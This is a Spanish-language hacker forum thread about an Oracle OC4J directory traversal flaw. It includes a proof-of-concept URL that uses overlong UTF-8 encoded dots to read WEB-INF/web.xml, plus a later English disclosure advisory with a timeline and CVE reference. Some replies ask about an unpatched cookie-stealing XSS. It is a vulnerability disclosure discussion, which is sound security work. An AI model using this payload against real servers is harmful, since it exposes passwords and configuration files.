elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  OC4J Directory Traversal
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: OC4J Directory Traversal  (Leído 5,930 veces)
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
OC4J Directory Traversal
« en: 7 Septiembre 2008, 20:17 pm »

Es similar a uno de Tomcat que acaba de salir  >:D
Oracle apenas hoy me creyó que era una vulnerabilidad :xD

es 0day..

El ûber PoC
Código:
http://localhost:8888/webapp/SOMETHING/%c0%ae%c0%ae/WEB-INF/web.xml

lalala

Saludos!!
« Última modificación: 7 Septiembre 2008, 20:19 pm por sirdarckcat » En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: OC4J Directory Traversal priv8
« Respuesta #1 en: 8 Septiembre 2008, 13:38 pm »

UTF8 ? mmmm que curioso mmmm tengo apps en ORACLE y el port puede variar, tendre que probar y/o si tienes algo "underground" dale private msg XDD


PD: 0day r0x, pero menciona los vectores de ataque que usaste para llegar al bug, el de Tomacat UTF8 Traversal hasta ahora no me ha funcionado en win32, pero veo que puede estar chido el 0day de ORACLE we!

-berz3k.
« Última modificación: 8 Septiembre 2008, 13:46 pm por berz3k » En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: OC4J Directory Traversal priv8
« Respuesta #2 en: 9 Septiembre 2008, 05:00 am »

no es vulnerable todo lo de ORACLE, solo OC4J, ^^ ta curioso el bug..
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: OC4J Directory Traversal priv8
« Respuesta #3 en: 27 Enero 2009, 12:06 pm »

ah ya es publico por cierto xD
Código:
Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server

Server Version Info: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
PoC: http://OC4J/web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml
Related: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
Explaination: The "%c0%ae%c0%ae" is interpreted as: ".." because on Java's side: "%c0%ae" is interpreted as: "\uC0AE" that get's casted to an ASCII-LOW char, that is: ".".

You can read dangerous configuration information including passwords, users, paths, etc..
Discovered: 8/16/08
Vendor contacted: 8/16/08
Vendor response: 8/18/08
Vendor reproduced the issue: 9/10/08
Vendor last contact: 9/30/08
Public Disclosure: 1/19/09

Oracle security bug id: 7391479

For more information contact Oracle Security Team: secalert_us@oracle.com

I really wanted to give a link to a patch, but I think it's better if this is known by sysadmins so they can filter this using an IDS.

Greetings!!
http://sirdarckcat.blogspot.com/2009/01/oracle-containers-for-java-directory.html

Lo muevo a nivel web.

Saludos!!
« Última modificación: 27 Enero 2009, 12:08 pm por sirdarckcat » En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: OC4J Directory Traversal
« Respuesta #4 en: 27 Enero 2009, 23:04 pm »

Si ya lo vi wey! , jamas rolaste un server para probar :-( , tengo varios oracles en produccion, y jamas me funciono :-( ...

CONGRATULATIONS MATE!!!

-berz3k.
« Última modificación: 27 Enero 2009, 23:07 pm por berz3k » En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: OC4J Directory Traversal
« Respuesta #5 en: 28 Enero 2009, 00:56 am »

Hace tiempo que le comente a sdc sobre un bug de XSS (con un simple robo de cookies te hacias admin xD) en otra app de oracle, igual y sigue vuln xD
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: OC4J Directory Traversal
« Respuesta #6 en: 28 Enero 2009, 05:41 am »

robo de cookies ? cuenta mas Azielito details , asi pruebo mas

-berz3k.
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: OC4J Directory Traversal
« Respuesta #7 en: 28 Enero 2009, 07:54 am »

esta en el subforo Test eso no azielito? segun yo si.. era en un framework si no mal recuerdo.

Saludos!!
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: OC4J Directory Traversal
« Respuesta #8 en: 28 Enero 2009, 19:18 pm »

No veo donde anda sdc XD

-berz3k.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Vulnerabilidad de directory traversal en el servicio FTP OBEX Bluetooth de HTC
Hacking Mobile
el-brujo 1 3,460 Último mensaje 26 Julio 2011, 08:23 am
por Gospel
HTC / Android OBEX FTP Service Directory Traversal Vulnerability
Hacking Mobile
Gospel 1 5,015 Último mensaje 15 Agosto 2011, 13:43 pm
por imoen
HTC / Android OBEX FTP Service Directory Traversal Vulnerability
Noticias
Novlucker 1 2,470 Último mensaje 26 Julio 2011, 18:29 pm
por el-brujo
Vulnerabilidad Directory traversal encontrada, ayuda. « 1 2 »
Hacking
Trollwer 10 7,612 Último mensaje 16 Julio 2021, 12:32 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines